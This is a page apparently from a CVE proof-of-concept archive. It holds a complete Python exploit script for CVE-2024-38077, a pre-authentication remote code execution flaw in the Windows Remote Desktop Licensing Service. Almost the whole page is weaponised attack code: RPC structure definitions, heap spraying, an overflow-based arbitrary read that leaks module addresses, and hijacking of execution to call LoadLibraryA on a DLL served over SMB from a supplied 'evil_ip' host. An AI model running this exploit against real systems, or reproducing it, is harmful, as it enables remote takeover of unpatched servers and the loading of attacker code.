4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-38077-EXP.py PY
import struct, hashlib, argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL, NDR
from impacket.dcerpc.v5.dtypes import BOOL, ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, LPSTR, PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Cryptodome.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey

UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"
dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0
BBYTE = UCHAR


def p8(x):
    return struct.pack("B", x)


def p16(x):
    return struct.pack("H", x)


def p32(x):
    return struct.pack("I", x)


def p64(x):
    return struct.pack("Q", x)


class CONTEXT_HANDLE(NDRSTRUCT):
    structure = (
        ("Data", "20s=b"),
    )

    def getAlignment(self):
        return 4


class TLSRpcGetVersion(NDRCALL):
    opnum = 0
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),
        ("version", PULONG),
    )


class TLSRpcGetVersionResponse(NDRCALL):
    structure = (
        ("version", ULONG),
    )


class TLSRpcConnect(NDRCALL):
    opnum = 1


class TLSRpcConnectResponse(NDRCALL):
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),
    )


class TLSBLOB(NDRSTRUCT):
    structure = (
        ("cbData", ULONG),
        ("pbData", PBYTE),
    )


class TLSCRYPT_ALGORITHM_IDENTIFIER(NDRSTRUCT):
    structure = (
        ("pszObjId", LPSTR),
        ("Parameters", TLSBLOB),
    )


class TLSCRYPT_BIT_BLOB(NDRSTRUCT):
    structure = (
        ("cbData", DWORD),
        ("pbData", PBYTE),
        ("cUnusedBits", DWORD),
    )


class TLSCERT_PUBLIC_KEY_INFO(NDRSTRUCT):
    structure = (
        ("Algorithm", TLSCRYPT_ALGORITHM_IDENTIFIER),
        ("PublicKey", TLSCRYPT_BIT_BLOB),
    )


class PTLSCERT_PUBLIC_KEY_INFO(NDRPOINTER):
    referent = (
        ("Data", TLSCERT_PUBLIC_KEY_INFO),
    )


class TLSCERT_EXTENSION(NDRSTRUCT):
    structure = (
        ("pszObjId", LPSTR),
        ("fCritical", BOOL),
        ("Value", TLSBLOB),
    )


class TLSCERT_EXTENSION_ARRAY(NDRUniConformantArray):
    item = TLSCERT_EXTENSION


class PTLSCERT_EXTENSION(NDRPOINTER):
    referent = (
        ("Data", TLSCERT_EXTENSION_ARRAY),
    )


class TLSHYDRACERTREQUEST(NDRSTRUCT):
    structure = (
        ("dwHydraVersion", DWORD),
        ("cbEncryptedHwid", DWORD),
        ("pbEncryptedHwid", PBYTE),
        ("szSubjectRdn", PWCHAR),
        ("pSubjectPublicKeyInfo", PTLSCERT_PUBLIC_KEY_INFO),
        ("dwNumCertExtension", DWORD),
        ("pCertExtensions", PTLSCERT_EXTENSION),
    )


class PTLSHYDRACERTREQUEST(NDRPOINTER):
    referent = (
        ("Data", TLSHYDRACERTREQUEST),
    )


class TLSRpcRequestTermServCert(NDRCALL):
    opnum = 34
    structure = (
        ("phContext", CONTEXT_HANDLE),
        ("pbRequest", TLSHYDRACERTREQUEST),
        ("cbChallengeData", DWORD),
        ("pdwErrCode", DWORD),
    )


class TLSRpcRequestTermServCertResponse(NDRCALL):
    structure = (
        ("cbChallengeData", ULONG),
        ("pbChallengeData", PBYTE),
        ("pdwErrCode", ULONG),
    )


class TLSRpcRetrieveTermServCert(NDRCALL):
    opnum = 35
    structure = (
        ("phContext", CONTEXT_HANDLE),
        ("cbResponseData", DWORD),
        ("pbResponseData", BBYTE),
        ("cbCert", DWORD),
        ("pbCert", BBYTE),
        ("pdwErrCode", DWORD),
    )


class TLSRpcRetrieveTermServCertResponse(NDRCALL):
    structure = (
        ("cbCert", PUINT),
        ("pbCert", BBYTE),
        ("pdwErrCode", PUINT),
    )


class TLSRpcTelephoneRegisterLKP(NDRCALL):
    opnum = 49
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),
        ("dwData", ULONG),
        ("pbData", BBYTE),
        ("pdwErrCode", ULONG)
    )


class TLSRpcTelephoneRegisterLKPResponse(NDRCALL):
    structure = (
        ("pdwErrCode", ULONG)
    )


class TLSCHALLENGEDATA(NDRSTRUCT):
    structure = (
        ("dwVersion", ULONG),
        ("dwRandom", ULONG),
        ("cbChallengeData", ULONG),
        ("pbChallengeData", PBYTE),
        ("cbReservedData", ULONG),
        ("pbReservedData", PBYTE),
    )


class PTLSCHALLENGEDATA(NDRPOINTER):
    referent = (
        ("Data", TLSCHALLENGEDATA),
    )


class TLSCHALLENGERESPONSEDATA(NDRSTRUCT):
    structure = (
        ("dwVersion", ULONG),
        ("cbResponseData", ULONG),
        ("pbResponseData", PBYTE),
        ("cbReservedData", ULONG),
        ("pbReservedData", PBYTE),
    )


class PTLSCHALLENGERESPONSEDATA(NDRPOINTER):
    referent = (
        ("Data", TLSCHALLENGERESPONSEDATA),
    )


class TLSRpcChallengeServer(NDRCALL):
    opnum = 44
    structure = (
        ("phContext", CONTEXT_HANDLE),
        ("dwClientType", ULONG),
        ("pClientChallenge", TLSCHALLENGEDATA),
        ("pdwErrCode", ULONG),
    )


class TLSRpcChallengeServerResponse(NDRCALL):
    structure = (
        ("pServerResponse", PTLSCHALLENGERESPONSEDATA),
        ("pServerChallenge", PTLSCHALLENGEDATA),
        ("pdwErrCode", ULONG),
    )


class TLSRpcResponseServerChallenge(NDRCALL):
    opnum = 45
    structure = (
        ("phContext", CONTEXT_HANDLE),
        ("pClientResponse", TLSCHALLENGERESPONSEDATA),
        ("pdwErrCode", ULONG),
    )


class TLSRpcResponseServerChallengeResponse(NDRCALL):
    structure = (
        ("pdwErrCode", ULONG),
    )


class TLSRpcRegisterLicenseKeyPack(NDRCALL):
    opnum = 38
    structure = (
        ("lpContext", CONTEXT_HANDLE),
        ("arg_1", BBYTE),
        ("arg_2", ULONG),
        ("arg_3", BBYTE),
        ("arg_4", ULONG),
        ("lpKeyPackBlob", BBYTE),
        ("arg_6", ULONG),
        ("pdwErrCode", ULONG),
    )


class TLSRpcRegisterLicenseKeyPackResponse(NDRCALL):
    structure = (
        ("pdwErrCode", ULONG),
    )


class WIDESTR_STRIPPED(WIDESTR):
    length = None

    def __getitem__(self, key):
        if key == 'Data':
            return self.fields[key].decode('utf-16le').rstrip('\x00')
        else:
            return NDR.__getitem__(self, key)

    def getDataLen(self, data, offset=0):
        if self.length is None:
            return super().getDataLen(data, offset)
        return self.length * 2


class WCHAR_ARRAY_256(WIDESTR_STRIPPED):
    length = 256


class LSKeyPack(NDRSTRUCT):
    structure = (
        ("dwVersion", DWORD),
        ("ucKeyPackType", UCHAR),
        ("szCompanyName", WCHAR_ARRAY_256),
        ("szKeyPackId", WCHAR_ARRAY_256),
        ("szProductName", WCHAR_ARRAY_256),
        ("szProductId", WCHAR_ARRAY_256),
        ("szProductDesc", WCHAR_ARRAY_256),
        ("wMajorVersion", WORD),
        ("wMinorVersion", WORD),
        ("dwPlatformType", DWORD),
        ("ucLicenseType", UCHAR),
        ("dwLanguageId", DWORD),
        ("ucChannelOfPurchase", UCHAR),
        ("szBeginSerialNumber", WCHAR_ARRAY_256),
        ("dwTotalLicenseInKeyPack", DWORD),
        ("dwProductFlags", DWORD),
        ("dwKeyPackId", DWORD),
        ("ucKeyPackStatus", UCHAR),
        ("dwActivateDate", DWORD),
        ("dwExpirationDate", DWORD),
        ("dwNumberOfLicenses", DWORD),
    )


class LPLSKeyPack(NDRPOINTER):
    referent = (
        ("Data", LSKeyPack),
    )


class TLSRpcKeyPackEnumNext(NDRCALL):
    opnum = 13
    structure = (
        ("phContext", CONTEXT_HANDLE),
        ("lpKeyPack", LPLSKeyPack),
        ("pdwErrCode", ULONG),
    )


class TLSRpcKeyPackEnumNextResponse(NDRCALL):
    structure = (
        ("pdwErrCode", ULONG),
    )


class TLSRpcDisconnect(NDRCALL):
    opnum = 2
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),
    )


class TLSRpcDisconnectResponse(NDRCALL):
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),
    )


class TLSRpcGetServerName(NDRCALL):
    opnum = 4
    structure = (
        ("ctx_handle", CONTEXT_HANDLE),
        ("serverName", WCHAR),
        ("nameLen", ULONG),
        ("errCode", ULONG),
    )


class TLSRpcGetServerNameResponse(NDRCALL):
    structure = (
        ("serverName", WCHAR),
        ("nameLen", ULONG),
        ("pdwErrCode", ULONG),
    )


# 反转编码后的字符串
def b24encode(data, charmap):
    data = data[::-1]
    data = bytes_to_long(data)
    enc = b""
    while data != 0:
        tmp = data % len(charmap)
        data //= len(charmap)
        enc += charmap[tmp]
    return enc[::-1]


# 发送注册许可证密钥包请求
def spray_lfh_chunk(size, loopsize):
    payload = b"\x00" * size
    reg_lic_keypack = construct_TLSRpcRegisterLicenseKeyPack(payload)
    for _ in range(loopsize):
        dce.request(reg_lic_keypack)


# 断开连接后的句柄
def disconnect(handle):
    global dce
    disconn = TLSRpcDisconnect()
    disconn["ctx_handle"] = handle
    disconn_res = dce.request(disconn)
    ret = disconn_res["ctx_handle"]
    return ret


# 从句柄列表中移除已经断开连接的句柄
def handles_free():
    global handle_lists, heap_base
    sleep(7)
    for i in range(0x8):
        handle = handle_lists[0x400 + i * 2]
        disconnect(handle)
        handle_lists.remove(handle)


def spray_handles(times):
    global dce, handle_lists
    handle_lists = []
    for _ in range(times):
        rpc_conn = TLSRpcConnect()
        res_rpc_conn = dce.request(rpc_conn)
        handle = res_rpc_conn["ctx_handle"]
        handle_lists.append(handle)


def spray_fake_obj(reg_lic_keypack, times=0x300):
    global dce
    for i in range(times):
        dce.request(reg_lic_keypack)


def construct_TLSRpcTelephoneRegisterLKP(payload):
    global ctx_handle
    tls_register_LKP = TLSRpcTelephoneRegisterLKP()
    tls_register_LKP["ctx_handle"] = ctx_handle
    tls_register_LKP["dwData"] = payload
    tls_register_LKP["pbData"] = payload
    tls_register_LKP["pdwErrCode"] = 0
    return tls_register_LKP


def construct_overflow_arbread_buf(addr, padding):
    payload = b""
    payload += p64(addr)
    if padding:
        payload += p32(0)
        payload += p32(0)
        payload += p32(1)
    tls_register_LKP = construct_TLSRpcTelephoneRegisterLKP(payload)
    return tls_register_LKP


# 构造Payload
def construct_overflow_fake_obj_buf(fake_obj_addr):
    payload = b""
    payload += p64(0)
    payload += p32(0)
    payload += p32(1)
    payload += p32(0)
    payload += p32(1)
    payload += p64(fake_obj_addr)
    payload += p8(1)
    tls_register_LKP = construct_TLSRpcTelephoneRegisterLKP(payload)
    return tls_register_LKP


def arb_read(addr, padding=False, passZero=False, leakHeapBaseOffset=0):
    global leak_idx, handle_lists, dce, ctx_handle
    if leakHeapBaseOffset != 0:
        spray_lfh_chunk(0x20, 0x800)
    else:
        spray_lfh_chunk(0x20, 0x400)
    spray_handles(0xc00)
    handles_free()
    serverName = "a" * 0x10
    get_server_name = TLSRpcGetServerName()
    get_server_name["serverName"] = serverName + "\x00"
    get_server_name["nameLen"] = len(serverName) + 1
    get_server_name["errCode"] = 0
    if leakHeapBaseOffset != 0:
        tls_register_LKP = construct_overflow_arbread_buf(addr[0], padding)
    else:
        tls_register_LKP = construct_overflow_arbread_buf(addr, padding)
    pbData = b"c" * 0x10
    tls_blob = TLSBLOB()
    tls_blob["cbData"] = len(pbData)
    tls_blob["pbData"] = pbData
    tls_cert_extension = TLSCERT_EXTENSION()
    tls_cert_extension["pszObjId"] = "d" * 0x10 + "\x00"
    tls_cert_extension["fCritical"] = False
    tls_cert_extension["Value"] = tls_blob
    pbData2 = bytes.fromhex(
        "3048024100bf1be06ab5c535d8e30a3b3dc616ec084ff4f5b9cfb2a30695ccc6c58c37356c938d3c165d980b07882a35f22ac2e580624cc08a2a3391e5e1f608f94764b27d0203010001")
    tls_crypt_bit_blob = TLSCRYPT_BIT_BLOB()
    tls_crypt_bit_blob["cbData"] = len(pbData2)
    tls_crypt_bit_blob["cbData"] = pbData2
    tls_crypt_bit_blob["cUnusedBits"] = 0
    tls_blob2 = TLSBLOB()
    tls_blob2["cbData"] = 0
    tls_blob2["pbData"] = b""
    tls_crypto_algorithm_identifier = TLSCRYPT_ALGORITHM_IDENTIFIER()
    tls_crypto_algorithm_identifier["pszObjId"] = "1.2.840.113549.1.1.1\x00"
    tls_crypto_algorithm_identifier["Parameters"] = tls_blob2
    tls_cert_public_key_info = TLSCERT_PUBLIC_KEY_INFO()
    tls_cert_public_key_info["Algorithm"] = tls_crypto_algorithm_identifier
    tls_cert_public_key_info["PublicKey"] = tls_crypt_bit_blob
    encryptedHwid = b"e" * 0x20
    hydra_cert_request = TLSHYDRACERTREQUEST()
    hydra_cert_request["dwHydraVersion"] = 0
    hydra_cert_request["cbEncryptedHwid"] = len(encryptedHwid)
    hydra_cert_request["pbEncryptedHwid"] = encryptedHwid
    hydra_cert_request["szSubjectRdn"] = "bbb\x00"
    hydra_cert_request["pSubjectPublicKeyInfo"] = tls_cert_public_key_info
    dwNumCertExtension = 0
    hydra_cert_request["dwNumCertExtension"] = dwNumCertExtension
    pbResponseData = b"a" * 0x10
    pbCert = b"b" * 0x10
    count = 0
    while True:
        count += 1
        sleep(5)
        try:
            dce.request(tls_register_LKP)
        except:
            pass
        retAddr = 0x0
        for handle in handle_lists[::-1]:
            if padding:
                get_server_name["ctx_handle"] = handle
                res_get_server_name = dce.request(get_server_name)
                err_code = res_get_server_name["pdwErrCode"]
                if (err_code == 0):
                    continue
            rpc_term_serv_cert = TLSRpcRequestTermServCert()
            rpc_term_serv_cert["phContext"] = handle
            rpc_term_serv_cert["pbRequest"] = hydra_cert_request
            rpc_term_serv_cert["cbChallengeData"] = 0x100
            rpc_term_serv_cert["pdwErrCode"] = 0
            rpc_retrieve_serv_cert = TLSRpcRetrieveTermServCert()
            rpc_retrieve_serv_cert["phContext"] = handle
            rpc_retrieve_serv_cert["cbResponseData"] = len(pbResponseData)
            rpc_retrieve_serv_cert["pbResponseData"] = pbResponseData
            rpc_retrieve_serv_cert["cbCert"] = len(pbCert)
            rpc_retrieve_serv_cert["pbCert"] = pbCert
            rpc_retrieve_serv_cert["pdwErrCode"] = 0
            try:
                res_rpc_term_serv_cert = dce.request(rpc_term_serv_cert)
                res_rpc_retrieve_serv_cert = dce.request(rpc_retrieve_serv_cert)
                data = res_rpc_retrieve_serv_cert["pbCert"]
                if b"n\x00c\x00a\x00c\x00n\x00" not in data:
                    handle_lists.remove(handle)
                    if leak_idx == 0:
                        if leakHeapBaseOffset != 0:
                            for i in range(len(data) - 6):
                                retAddr = data[i + 4:i + 6] + data[i + 2:i + 4] + data[i:i + 2]
                                retAddr = bytes_to_long(retAddr) - leakHeapBaseOffset
                                if retAddr & 0xffff == 0:
                                    leak_idx = i
                                    print("[+] Find leak_idx: 0x{:x}".format(leak_idx))
                                    return retAddr
                        else:
                            print("[-] Finding leak_idx error!")
                            exit(-1)
                    else:
                        if passZero:
                            data = data[leak_idx:leak_idx + 4]
                            retAddr = data[2:4] + data[0:2]
                        else:
                            data = data[leak_idx:leak_idx + 6]
                            retAddr = data[4:6] + data[2:4] + data[0:2]
                        retAddr = bytes_to_long(retAddr)
                        return retAddr
            except:
                continue
        if leakHeapBaseOffset != 0:
            if count < len(addr):
                targetAddr = addr[count]
                tls_register_LKP = construct_overflow_arbread_buf(targetAddr, padding)
            else:
                print("G!")
                targetAddr = 0xdeaddeadbeefbeef
                tls_register_LKP = construct_overflow_arbread_buf(targetAddr, True)
        # if leakHeapBaseOffset != 0:
        #     # spray_lfh_chunk(0x20, 0x800)
        # else:
        #     # spray_lfh_chunk(0x20, 0x400)
        # spray_handles(0xc00)
        # handles_free()


def construct_fake_obj(heap_base, rpcrt4_base, kernelbase_base, arg1, NdrServerCall2_offset=0x16f50,OSF_SCALL_offset=0xdff10, LoadLibraryA_offset=0xf6de0):
    payload = b""
    payload += b"a" * 21
    payload += rpcrt4_base
    payload += NdrServerCall2_offset
    payload += OSF_SCALL_offset
    payload += heap_base
    payload += kernelbase_base
    payload += LoadLibraryA_offset
    payload += arg1
    fake_obj_addr = rpcrt4_base + NdrServerCall2_offset
    return payload, fake_obj_addr


def construct_TLSRpcRegisterLicenseKeyPack(payload):
    global ctx_handle
    my_cert_exc = bytes.fromhex(
        "308201363081e5a0030201020208019e2bfac0ae2c30300906052b0e03021d05003011310f300d06035504031e06006200620062301e170d3730303630353039323731335a170d3439303630353039323731335a3011310f300d06035504031e06006200620062305c300d06092a864886f70d0101010500034b003048024100b122dfa634ad803cbf0c1133986e7e551a036a1dfd521cd613c4972cd6f096f2a3dd0b8f80b8a26909137225134ec9d98b3acffd79c665061368c217613aba050203010001a3253023300f0603551d13040830060101ff020100301006082b06010401823712040401020300300906052b0e03021d05000341003f4ceda402ad607b9d1a38095efe25211010feb1e5a30fe5af6705c2e53a19949eaf50875e2e77c71a9b4945d631360c9dbec1f17d7e096c318547f8167d840e")
    my_cert_sig = bytes.fromhex(
        "3082036406092a864886f70d010702a0820355308203510201013100300b06092a864886f70d010701a0820339308201363081e5a0030201020208019e2bfac0ab6d10300906052b0e03021d05003011310f300d06035504031e06006200620062301e170d3730303630353039323731335a170d3439303630353039323731335a3011310f300d06035504031e06006200620062305c300d06092a864886f70d0101010500034b003048024100b122dfa634ad803cbf0c1133986e7e551a036a1dfd521cd613c4972cd6f096f2a3dd0b8f80b8a26909137225134ec9d98b3acffd79c665061368c217613aba050203010001a3253023300f0603551d13040830060101ff020100301006082b06010401823712040401020300300906052b0e03021d05000341009fd29b18115c7ef500a2ee543a4bb7528403ccb4e9fe7fe3ac2dcbf9ede68a1eca02f97c6a0f3c2384d85ab12418e523db90958978251e28d0e7903829e46723308201fb308201a9a0030201020208019e2bfac0ab6d10300906052b0e03021d05003011310f300d06035504031e06006200620062301e170d3730303630353039323731335a170d3439303630353039323731335a300d310b300906035504031302610030820122300d06092a864886f70d01010105000382010f003082010a0282010100e05a714323273db5f17c731e7db3b07397cf08a6d614484ab715793af931376622e3b86820ddb26ea763636c55092c712296da18049fd7e61b4429b1a14a85ab4567639c2d2fbc6098893ed9c553fb14f9f488f6ffa38f9ee3aaf44888981bdec21e7d617e6c7fc019e8f896098eb76470d56c4666c015f784f172aa7b4999c6fdc48e6e2a4cdaf256d69fcdd14cc82d50eb5a4e48a810679f97a5f6a933dd12e63159a72c1b3ba8c7e59af0dabdcc40f2489df6335f74614b1d2b9016644a12bce70e7470977a6e5025e9251dc4300d6ef39860cad59b06a9b81a27491e83ea826a505c3c756df9529e538259c004a832a67783893486171d3a075db49026e90203010001a3253023300f0603551d13040830060101ff020100301006082b06010401823712040401020300300906052b0e03021d05000341004b949db70bb077d19adfc707c20420afb99ae1f0a3e857ab4e3f085fe2c84b539412f4235dce03a53a43ddaa76adf7cc32e36af7b8e4e31707f881241d6bf36b3100")
    TEST_RSA_PUBLIC_MSKEYBLOB = bytes.fromhex(
        "080200001066000020000000c61b815f961a35c688b5af232f81158c3a21f95ec897a6efa41d5b23bcf0387e")
    data = b"\x00" * 0x3c
    data += p32(len(payload))
    data += payload
    data += b"\x00" * 0x10
    rsa_pub_key = CryptImportKey(TEST_RSA_PUBLIC_MSKEYBLOB)
    encrypted_data = CryptEncrypt(rsa_pub_key, data)
    key = TEST_RSA_PUBLIC_MSKEYBLOB
    data = encrypted_data
    payload = b""
    payload += p32(len(key))
    payload += key
    payload += p32(len(data))
    payload += data
    reg_lic_keypack = TLSRpcRegisterLicenseKeyPack()
    reg_lic_keypack["lpContext"] = ctx_handle
    reg_lic_keypack["arg_1"] = my_cert_sig
    reg_lic_keypack["arg_2"] = len(my_cert_sig)
    reg_lic_keypack["arg_3"] = my_cert_exc
    reg_lic_keypack["arg_4"] = len(my_cert_exc)
    reg_lic_keypack["lpKeyPackBlob"] = payload
    reg_lic_keypack["arg_6"] = len(payload)
    reg_lic_keypack["pdwErrCode"] = 0
    return reg_lic_keypack


def construct_TLSRpcKeyPackEnumNext(handle):
    pLSKeyPack = LSKeyPack()
    pLSKeyPack["dwVersion"] = 1
    pLSKeyPack["ucKeyPackType"] = 1
    pLSKeyPack["szCompanyName"] = "a" * 255 + "\x00"
    pLSKeyPack["szKeyPackId"] = "a" * 255 + "\x00"
    pLSKeyPack["szProductName"] = "a" * 255 + "\x00"
    pLSKeyPack["szProductId"] = "a" * 255 + "\x00"
    pLSKeyPack["szProductDesc"] = "a" * 255 + "\x00"
    pLSKeyPack["wMajorVersion"] = 1
    pLSKeyPack["wMinorVersion"] = 1
    pLSKeyPack["dwPlatformType"] = 1
    pLSKeyPack["ucLicenseType"] = 1
    pLSKeyPack["dwLanguageId"] = 1
    pLSKeyPack["ucChannelOfPurchase"] = 1
    pLSKeyPack["szBeginSerialNumber"] = "a" * 255 + "\x00"
    pLSKeyPack["dwTotalLicenseInKeyPack"] = 1
    pLSKeyPack["dwProductFlags"] = 1
    pLSKeyPack["dwKeyPackId"] = 1
    pLSKeyPack["ucKeyPackStatus"] = 1
    pLSKeyPack["dwActivateDate"] = 1
    pLSKeyPack["dwExpirationDate"] = 1
    pLSKeyPack["dwNumberOfLicenses"] = 1
    rpc_key_pack_enum_next = TLSRpcKeyPackEnumNext()
    rpc_key_pack_enum_next["phContext"] = handle
    rpc_key_pack_enum_next["lpKeyPack"] = pLSKeyPack
    rpc_key_pack_enum_next["pdwErrCode"] = 0
    return rpc_key_pack_enum_next


def hijack_rip_and_rcx(heap_base, rpcrt4_base, kernelbase_base, arg1):
    global handle_lists, dce
    payload, fake_obj_addr = construct_fake_obj(heap_base, rpcrt4_base, kernelbase_base, arg1)
    print("[+] Calculate fake_obj_addr: 0x{:x}".format(fake_obj_addr))
    reg_lic_keypack = construct_TLSRpcRegisterLicenseKeyPack(payload)
    print("[*] Hijack rip and rcx")
    print("[*] rip: kernelbase!LoadLibraryA")
    print("[*] rcx: {0}".format(arg1))
    while True:
        spray_fake_obj(reg_lic_keypack)
        spray_lfh_chunk(0x20, 0x800)
        spray_handles(0xc00)
        handles_free()
        tls_register_LKP = construct_overflow_fake_obj_buf(fake_obj_addr)
        try:
            dce.request(tls_register_LKP)
        except:
            pass
        print("[*] Try to connect to server...")
        for handle in handle_lists[::-1]:
            rpc_key_pack_enum_next = construct_TLSRpcKeyPackEnumNext(handle)
            try:
                dce.request(rpc_key_pack_enum_next)
            except:
                pass
        print("[*] Check whether the exploit successed? (Y/N)\t")
        status = input("[*] ")
        if status == "Y" or status == "y":
            print("[+] Exploit success!")
            exit(0)


def connect_to_license_server(target_ip):
    global dce, rpctransport, ctx_handle
    stringbinding = epm.hept_map(target_ip, UUID, protocol="ncacn_ip_tcp")
    rpctransport = transport.DCERPCTransportFactory(stringbinding)
    rpctransport.set_connect_timeout(100)
    dce = rpctransport.get_dce_rpc()
    dce.set_auth_level(2)
    dce.connect()
    dce.bind(UUID)
    rpc_conn = TLSRpcConnect()
    res_rpc_conn = dce.request(rpc_conn)
    ctx_handle = res_rpc_conn["ctx_handle"]
    get_version = TLSRpcGetVersion()
    get_version["ctx_handle"] = ctx_handle
    get_version["version"] = 3
    res_get_version = dce.request(get_version)
    version = res_get_version["version"]
    print("[+] Get Server version: 0x{:x}".format(version))
    CHAL_DATA = b"a" * 0x10
    RESV_DATA = b"b" * 0x10
    cli_chal = TLSCHALLENGEDATA()
    cli_chal["dwVersion"] = 0x10000
    cli_chal["dwRandom"] = 0x4
    cli_chal["cbChallengeData"] = len(CHAL_DATA) + 1
    cli_chal["pbChallengeData"] = CHAL_DATA + b"\x00"
    cli_chal["cbReservedData"] = len(RESV_DATA) + 1
    cli_chal["pbReservedData"] = RESV_DATA + b"\x00"
    chal_server = TLSRpcChallengeServer()
    chal_server["phContext"] = ctx_handle
    chal_server["dwClientType"] = 0
    chal_server["pClientChallenge"] = cli_chal
    chal_server["pdwErrCode"] = 0
    chal_response = dce.request(chal_server)
    g_pszServerGuid = "d63a773e-6799-11d2-96ae-00c04fa3080d".encode("utf-16")[2:]
    dwRandom = chal_response["pServerChallenge"]["dwRandom"]
    pbChallengeData = b"".join(chal_response["pServerChallenge"]["pbChallengeData"])
    pbResponseData = hashlib.md5(pbChallengeData[:dwRandom] + g_pszServerGuid + pbChallengeData[dwRandom:]).digest()
    pClientResponse = TLSCHALLENGERESPONSEDATA()
    pClientResponse["dwVersion"] = 0x10000
    pClientResponse["cbResponseData"] = len(pbResponseData)
    pClientResponse["pbResponseData"] = pbResponseData
    pClientResponse["cbReservedData"] = 0
    pClientResponse["pbReservedData"] = ""
    resp_ser_chal = TLSRpcResponseServerChallenge()
    resp_ser_chal["phContext"] = ctx_handle
    resp_ser_chal["pClientResponse"] = pClientResponse
    resp_ser_chal["pdwErrCode"] = 0
    res_resp_ser_chal = dce.request(resp_ser_chal)


def leak_addr():
    global heap_base, ntdll_base, peb_base, pe_base, rpcrt4_base, kernelbase_base
    heap_offset_list = [0x100008, 0x100008, 0x400000, 0x600000, 0x800000, 0xb00000, 0xd00000, 0xf00000]
    heap_base = arb_read(heap_offset_list, leakHeapBaseOffset=0x188)
    print("[+] Leak heap_base: 0x{:x}".format(heap_base))
    ntdll_base = arb_read(heap_base + 0x102048, padding=True) - 0x1bd2a8
    print("[+] Leak ntdll_base: 0x{:x}".format(ntdll_base))
    tls_bit_map_addr = ntdll_base + 0x1bd268
    print("[+] Leak tls_bit_map_addr: 0x{:x}".format(tls_bit_map_addr))
    peb_base = arb_read(tls_bit_map_addr, padding=True) - 0x80
    print("[+] Leak peb_base: 0x{:x}".format(peb_base))
    pe_base = arb_read(peb_base + 0x12, padding=True, passZero=True) << 16
    print("[+] Leak pe_base: 0x{:x}".format(pe_base))
    pe_import_table_addr = pe_base + 0x10000
    print("[+] Leak pe_import_table_addr: 0x{:x}".format(pe_import_table_addr))
    rpcrt4_base = arb_read(pe_import_table_addr, padding=True) - 0xa4d70
    print("[+] Leak rpcrt4_base: 0x{:x}".format(rpcrt4_base))
    rpcrt4_import_table_addr = rpcrt4_base + 0xe7bf0
    print("[+] Leak rpcrt4_import_table_addr: 0x{:x}".format(rpcrt4_import_table_addr))
    kernelbase_base = arb_read(rpcrt4_import_table_addr, padding=True) - 0x10aec0
    print("[+] Leak kernelbase_base: 0x{:x}".format(kernelbase_base))
    return heap_base


def pwn(target_ip, evil_ip, evil_dll_path, check_vuln_exist):
    global dce, rpctransport, handle_lists, leak_idx, heap_base, rpcrt4_base, kernelbase_base, pe_base, peb_base
    arg1 = "\\\\{0}{1}".format(evil_ip, evil_dll_path)
    print("-" * 0x50)
    print(DESCRIPTION)
    print("\ttarget_ip: {0}\n\tevil_ip: {1}\n\tevil_dll_path: {2}\n\tcheck_vuln_exist: {3}".format(target_ip, evil_ip,arg1,check_vuln_exist))
    # 循环3次
    for i in range(TRY_TIMES):
        print("-" * 0x50)
        print("[*] Run exploit script for {0} / {1} times".format(i + 1, TRY_TIMES))
        try:
            connect_to_license_server(target_ip)  # 建立连接
            heap_base = leak_addr()  # 泄漏dll基地址,2025成功
            if heap_base is not None:
                print("[+] Target exists vulnerability, try exploit...")
            else:
                print("[-] Failed to check for vulnerability.")
                exit(0)
            hijack_rip_and_rcx(heap_base, rpcrt4_base, kernelbase_base, arg1)  # 劫持rip rcx
            # 断开连接
            dce.disconnect()
            rpctransport.disconnect()
        # 如果失败重复两次
        except (ConnectionResetError, DCERPCException) as e:
            if i == TRY_TIMES - 1:
                print("[-] Crashed {0} times, run exploit script failed!".format(TRY_TIMES))
            else:
                print("[-] Crashed, waiting for the service to restart, need {0} seconds...".format(SLEEP_TIME))
                sleep(SLEEP_TIME)
            handle_lists = []
            leak_idx = 0
            pass


if __name__ == '__main__':
    parse = argparse.ArgumentParser(description=DESCRIPTION)
    parse.add_argument("--target_ip", type=str, required=True, help="Target IP, eg: 192.168.120.1")
    parse.add_argument("--evil_ip", type=str, required=True, help="Evil IP, eg: 192.168.120.2")
    parse.add_argument("--evil_dll_path", type=str, required=False, default="\\smb\\evil_dll.dll",
                       help="Evil dll path, eg: \\smb\\evil_dll.dll")
    parse.add_argument("--check_vuln_exist", type=bool, required=False, default=False,
                       help="Check vulnerability exist before exploit")
    args = parse.parse_args()
    pwn(args.target_ip, args.evil_ip, args.evil_dll_path, args.check_vuln_exist)
    # pwn(args.target_ip, args.evil_ip)